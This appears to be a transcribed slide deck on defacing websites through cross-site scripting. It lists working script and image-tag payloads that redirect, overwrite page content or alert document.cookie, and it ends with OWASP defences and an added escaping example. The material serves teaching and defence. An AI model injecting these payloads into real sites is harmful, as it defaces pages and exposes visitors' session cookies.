cross site scripting - web defacement techniques

Web Defacement – XSS

Upload: ronan-dunne

Post on 09-Jun-2015

Page 1: Cross Site Scripting - Web Defacement Techniques

Web Defacement – XSS

Page 2: Cross Site Scripting - Web Defacement Techniques

Introduction

• Website defacement is an attack on a website that changes the visual appearance of the site or a webpage. Defacing is one of the most common things an attacker does after finding a vulnerability in a website.

• Defacement is generally meant as a kind of electronic graffiti, although recently it has become a means to spread messages by politically motivated "cyber protesters" or hacktivists.

Page 3: Cross Site Scripting - Web Defacement Techniques

Testing

• The string Test will be entered and captured each time using OWASP's ZAP Proxy. Once it is captured, we will then replace Test with our malicious code, in turn bypassing the client-side preventions the web site has in place.

Page 4: Cross Site Scripting - Web Defacement Techniques

1 • Redirects to a hacked image outside the app domain

<script>window.location="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>

Page 5: Cross Site Scripting - Web Defacement Techniques

2 • Adds a hacked image to the page

<img src="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg" onerror=alert(document.cookie);>

Page 6: Cross Site Scripting - Web Defacement Techniques

3 • Cover full page with Hacked - in App Domain

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Page 7: Cross Site Scripting - Web Defacement Techniques

4 • Change background to RED - in App Domain

<script>document.body.bgColor="red";</script>

Page 8: Cross Site Scripting - Web Defacement Techniques

5 • Set the background to Hacked Image - in App Domain

<script>document.body.background="http://www.theblacktechreport.com/wp-content/uploads/2011/01/hacked.jpg";</script>

Page 9: Cross Site Scripting - Web Defacement Techniques

OWASP XSS Defense

1 Use regular expressions on the server side to filter out all hazardous input when possible. If any or all of these characters are needed by the application, proper escaping is enough. A non-comprehensive list of characters likely to be part of an attack vector is:

• <> (triangular parenthesis)
• () (parenthesis)
• " (quotation mark)
• & (ampersand sign)
• ' (single apostrophe)
• + (plus sign)
• % (percent sign)
• = (equals sign)
• : (colon)
• ` (forward tick)
• ; (semicolon)
• ´ (back tick)

2 Escape all the untrusted output before presenting it to the UI. Follow the rules detailed at the following link to ensure proper escaping for every context and location: https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet

3 When possible, it is recommended to enforce a specific charset encoding (using 'Content-Type' header or <meta> tag).
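
The three defenses above applied to a single form field, as an added example that is not part of the original slides: a server-side allow-list check, HTML escaping on output, and an explicit charset. The function names, the "name" field and its allow-list pattern are assumptions made for illustration; the escaping covers HTML element and quoted-attribute contexts only.

```javascript
// Added example (not from the slides). All names here are hypothetical.

// Defense 1: server-side allow-list. It runs on the server, so it still applies
// when the request was edited in an intercepting proxy after client-side checks.
// Assumed rule for a "name" field: letters, digits, space and . , ' - (1 to 64 chars).
const NAME_PATTERN = /^[\p{L}\p{N} .,'-]{1,64}$/u;

function isValidName(input) {
  return typeof input === "string" && NAME_PATTERN.test(input);
}

// Defense 2: escape untrusted output for HTML element / quoted-attribute context.
// The apostrophe is allowed as input above, so it must be escaped here.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "`": "&#x60;", "=": "&#x3D;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"'`=]/g, (ch) => HTML_ESCAPES[ch]);
}

// Defense 3: declare the charset in both the header and a <meta> tag so the
// browser does not guess an encoding.
function renderGreeting(untrustedName) {
  return {
    headers: { "Content-Type": "text/html; charset=utf-8" },
    body: '<!doctype html><meta charset="utf-8"><p>Hello, ' +
      escapeHtml(untrustedName) + "</p>",
  };
}

// Sample inputs: the Test string, a legitimate name containing a listed
// character, and the background-colour payload from slide 7.
const SAMPLES = ["Test", "O'Brien", '<script>document.body.bgColor="red";</script>'];

function demo() {
  return SAMPLES.map((input) => ({
    input,
    accepted: isValidName(input),
    rendered: renderGreeting(input).body,
  }));
}

console.log(demo());
```

Validation decides whether to accept the request; escaping is applied on every render regardless, so a value that reaches the page by another route is still displayed as text.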